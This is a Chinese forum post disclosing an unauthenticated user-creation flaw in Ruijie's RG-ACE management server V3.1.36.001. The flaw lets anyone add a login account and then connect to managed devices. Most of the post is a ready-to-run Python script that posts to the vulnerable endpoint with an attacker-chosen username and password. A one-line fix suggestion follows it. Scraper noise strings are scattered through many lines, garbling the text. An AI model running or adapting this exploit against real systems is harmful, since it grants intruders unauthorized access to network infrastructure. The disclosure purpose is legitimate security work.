找回密码
 立即注册
查看: 2598|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
! _3 E$ y# g; n/ x8 `6 [! J4 M, X; S+ O5 B1 t
3 g2 ~( ~4 e. y7 Y/ F
测试的具体版本是# ]" l9 U' E; [: F8 f) v& j
产品名称: 锐捷应用控制引擎7 A+ {+ P2 F' U2 o! s4 i
版本号: 3.1.36.001 TC
; @7 c0 [" z- v! H' [: v编译时间: 2011042917307 q. \- w7 E' f
) W, {2 w7 T' }; g1 Q6 [
( T% g6 d/ m( L
漏洞证明:
" ?' g0 N2 t$ g7 {& B& P0 W9 [" n6 ?6 p
) h  Y1 y1 q  v3 D$ }9 N' ]& R& E2 G" x# m% o; a

4 o) {! j! A3 }8 M  Q; {4 m0 w
: C! D7 `% A& W1 p- o) _. }! A6 a5 n4 @6 z1 l# L

" b7 L) s/ ~& J% x1 {执行脚本
# K! m6 W9 H8 }9 ?8 v& B) ^# g" k6 Z#! /usr/bin/env python6 x$ ?& t, q4 x3 I2 D! N3 B
#coding=gbk
8 r5 Z+ N8 ^# u# ?2 f  c#RG-ACE管理服务器 V3.1.36.001
9 C4 A' @3 F+ Z, ]import urllib2, urllib,cookielib
3 R3 a2 c. n# n- ~9 [2 k" d9 curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
0 U; B+ y5 j6 V8 l3 q% Nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))9 P" d" D9 P( O) }
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
5 H- L+ T% X( l% g# S9 e" ipost=(("event","userManager.doInsertUserInfo"),
  A, d$ V  U. r4 s! h("useractionname","addButtonValue"),
& d( g' M+ K5 a# H+ J8 \1 [' L1 Y("useropermanager","userManager"),! c( B$ m% Q. K, N" g& Y
("userName","t"), #######账号自己加
' q8 Y& o. ~5 t  y8 S("pwd","aaaaaa"),######密码自己加2 R+ f. b& V1 W5 j/ C
("trueName","ad"),; J' s! k; S9 ~
("email",""),1 A  G& L7 s* L0 J/ `0 R  N
("mobilePhone",""),; m9 q9 `' r8 C) s, H( Y
("officePhone",""),% A1 J- t& S7 l4 s! p- ~& @. P
("addr",""),
+ ?! a7 m" d" F- S4 T6 Y* u("submit","确定"))% T- M* |0 i; y5 z
urllib2.install_opener(opener)# x/ i7 z- ^5 U/ o1 ^0 `8 d
p=urllib2.urlopen(url, urllib.urlencode(post)).read()" ?' E6 a# @) G; w4 y
print "Done"
6 M' T$ a  V- V( A( i
2 _7 O: G" {: y5 |登录,连接设备) M) b3 j9 w5 S. ?2 A
/ u+ ?  i# ~: E- S! e7 i, c

7 a! A5 K7 ]# J; O$ M- h: E
! w3 n( J2 U. X& _  F, B+ y6 X2 ], G) v6 D

5 [% e9 z$ g; I# I& I% Q# N, i默认的管理员admin权限更大点3 I9 P4 y$ l& V& o/ ~1 h- Z

; \5 V4 K2 e) F  D$ ^6 x
1 l+ D. b  I8 _/ R
7 r" n4 h0 Y: z- Y 3 X  ?0 @$ `2 p6 L9 h

  @  G. G6 ~7 c修复方案:
% q7 d# d' f# l加强对接口的权限验证* n/ C$ j+ e) [+ A( ]
0 R/ m# P& Q$ U) r7 u7 Q! V" V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表